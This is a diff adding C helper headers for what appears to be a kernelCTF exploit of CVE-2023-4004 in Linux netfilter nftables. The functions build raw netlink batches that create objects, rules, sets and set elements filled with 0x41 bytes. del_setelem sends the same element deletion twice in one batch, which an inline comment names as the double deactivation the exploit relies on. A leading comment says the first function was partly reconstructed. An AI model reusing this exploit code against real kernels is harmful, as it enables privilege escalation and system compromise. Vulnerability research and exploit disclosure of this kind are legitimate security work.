+/* signature and batch boilerplate reconstructed from the identical new_obj_tunnel/new_obj_quota template; the name new_obj_ct_expect is inferred from the NFT_OBJECT_CT_EXPECT payload it builds */
+void new_obj_ct_expect(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){
+    struct nl_msg * msg = nlmsg_alloc();
+    //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE);
+    struct nlmsghdr *hdr1 = nlmsg_put(
+        msg,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin wit seq number 0
+        NFNL_MSG_BATCH_BEGIN, // TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST //NLM_F_ECHO
+    );
+    struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg));
+    h->nfgen_family = 2;
+    h->version = 0;
+    h->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg));
+
+    struct nl_msg * msg2 = nlmsg_alloc();
+    struct nlmsghdr *hdr2 = nlmsg_put(
+        msg2,
+        NL_AUTO_PORT, // auto assign current pid
+        NL_AUTO_SEQ, // begin wit seq number 0
+        (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE
+        sizeof(struct nfgenmsg),
+        NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO
+    );
+    struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg));
+    h2->nfgen_family = 2;//NFPROTO_IPV4;
+    h2->version = 0;
+    h2->res_id = NFNL_SUBSYS_NFTABLES;
+    memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg));
+    struct nl_msg * msg3 = nlmsg_alloc();
+    struct nlmsghdr *hdr3 = nlmsg_put(
+        msg3,
+        NL_AUTO_PORT, // auto assign
current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + char *a = malloc(0x100); + memset(a,0x41,0x100); + + nla_put_u8(data, NFTA_CT_EXPECT_L4PROTO, 0x41); + nla_put_u16(data, NFTA_CT_EXPECT_DPORT, 0x4141); + nla_put_u32(data, NFTA_CT_EXPECT_TIMEOUT, 0x41414141); + nla_put_u8(data, NFTA_CT_EXPECT_SIZE, 0x41); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_CT_EXPECT)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} +void new_obj_tunnel(struct nl_sock * socket, char *table_name, char *obj_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *ip = nlmsg_alloc(); + struct nl_msg *opts = nlmsg_alloc(); + struct nl_msg *opts_gen = nlmsg_alloc(); + //init ip + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_u32(ip, NFTA_TUNNEL_KEY_IP_DST, 0x41414141); + + nla_put_u16(opts_gen, NFTA_TUNNEL_KEY_GENEVE_CLASS, 0x10); + nla_put(opts_gen, NFTA_TUNNEL_KEY_GENEVE_DATA, 0x80, a); + nla_put_u8(opts_gen, NFTA_TUNNEL_KEY_GENEVE_TYPE, 0x10); + + nla_put_nested(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE|NLA_F_NESTED, opts_gen); + //struct nlattr *nla = nla_reserve(opts, NFTA_TUNNEL_KEY_OPTS_GENEVE, nlmsg_datalen(opts_gen->nm_nlh)); + //nla->nla_type |= NLA_F_NESTED; + //memcpy(nla_data(nla), 
nlmsg_data(opts_gen->nm_nlh),nlmsg_datalen(opts_gen->nm_nlh)); + + nla_put_u32(data, NFTA_TUNNEL_KEY_ID, 0x41414141); + nla_put_nested(data, NFTA_TUNNEL_KEY_IP, ip); + nla_put_nested(data, NFTA_TUNNEL_KEY_OPTS, opts); + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_TUNNEL)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object tunnel %s\n",obj_name); + } +} + +void new_obj_quota(struct nl_sock * socket, char *table_name, char *obj_name,void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *data = nlmsg_alloc(); + //init ip + nla_put_u64(data, NFTA_QUOTA_BYTES, 0x100); + + nla_put_nested(msg2, NFTA_OBJ_DATA, data); + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(NFT_OBJECT_QUOTA)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + if(udata>0) + nla_put(msg2, NFTA_OBJ_USERDATA, ulen, udata); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object quota 
%s\n",obj_name); + } +} + +void get_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETOBJ, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_u32(msg, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg, NFTA_OBJ_NAME, obj_name); + nla_put_string(msg, NFTA_OBJ_TABLE, table_name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get obj %s\n",obj_name); + } +} + +void del_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/rule.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/rule.h new file mode 100644 index 00000000..d1fcd292 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/rule.h @@ -0,0 +1,71 @@ +void new_rule(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + 
NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWRULE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nl_msg * exprs = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *expr_data = nlmsg_alloc(); + + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_string(expr_data, NFTA_MATCH_NAME, "set"); + nla_put_u32(expr_data, NFTA_MATCH_REV, htonl(0)); + nla_put(expr_data, NFTA_MATCH_INFO,0x100,a); + + nla_put_string(data_nest, NFTA_EXPR_NAME, "match"); + nla_put_nested(data_nest, NFTA_EXPR_DATA, expr_data); + + nla_put_nested(exprs, NFTA_LIST_ELEM, data_nest); + nla_put_string(msg2, NFTA_RULE_TABLE, table_name); + nla_put_string(msg2, NFTA_RULE_CHAIN, chain_name); + nla_put_nested(msg2, NFTA_RULE_EXPRESSIONS, exprs); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create rule\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/set.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/set.h new file mode 100644 index 00000000..d053bed8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/set.h @@ -0,0 +1,77 @@ +void new_set(struct nl_sock * socket, char *table_name, char *set_name, uint32_t obj_type){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSET),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO 
+ ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *data_nest_nest = nlmsg_alloc(); + //init IPSET_ATTR_DATA + + int i=0; + + nla_put_u32(data_nest_nest, NFTA_SET_FIELD_LEN, htonl(0x10)); + for(i=0;i<2;i++){ + nla_put_nested(data_nest, NFTA_LIST_ELEM, data_nest_nest); + } + + nla_put_nested(data, NFTA_SET_DESC_CONCAT, data_nest); + //create test1 + nla_put_string(msg2, NFTA_SET_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_NAME, set_name); + nla_put_u32(msg2, NFTA_SET_ID, 0x10); + nla_put_nested(msg2, NFTA_SET_DESC, data); + nla_put_u32(msg2, NFTA_SET_KEY_LEN, htonl(0x40)); + nla_put_u32(msg2, NFTA_SET_FLAGS, htonl(NFT_SET_INTERVAL|NFT_SET_OBJECT|NFT_SET_CONCAT)); + nla_put_u32(msg2, NFTA_SET_OBJ_TYPE, htonl(obj_type)); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/setelem.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/setelem.h new file mode 100644 index 00000000..6e8a2a28 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/setelem.h @@ -0,0 +1,212 @@ +#define OBJ_FOR_REF "obj-for-ref" +#define ELEM_KEY_END "test-elem-key-end" +void new_setelem(struct nl_sock * socket,char *table_name, char *set_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + 
NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + struct nl_msg *elem_end = nlmsg_alloc(); + char *key = malloc(0x40); + char *key_end = malloc(0x40); + memset(key,0xff,0x40); + memset(key_end,0xff,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, OBJ_FOR_REF); + //nla_put_u32(elem_nest, NFTA_SET_ELEM_FLAGS, htonl(NFT_SET_ELEM_CATCHALL)); + if(udata>0){ + nla_put(elem_nest, NFTA_SET_ELEM_USERDATA, ulen, udata); + } + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create setelem\n"); + } +} + + +void del_setelem(struct nl_sock * socket){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + char *key = malloc(0x40); + memset(key,0x41,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + //nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, "test-obj2"); + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, "test_table"); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, "test_set"); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + 
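+    // note: total_size budgets hdr2 twice and the memcpys below append the same DELSETELEM message back-to-back, so a single batch deletes the identical element twice (the double deactivation this exploit relies on)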
+ uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len)*2 + NLMSG_ALIGN(hdr3->nlmsg_len);
+ char *buf = malloc(total_size);
+ memset(buf,0,total_size);
+ memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len));
+ memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len)*2, hdr3, NLMSG_ALIGN(hdr3->nlmsg_len));
+ int res = nl_sendto(socket, buf, total_size);
+ nlmsg_free(msg);
+ if (res < 0) {
+ fprintf(stderr, "sending message failed\n");
+ } else {
+ printf("Delete setelem\n");
+ }
+}
+
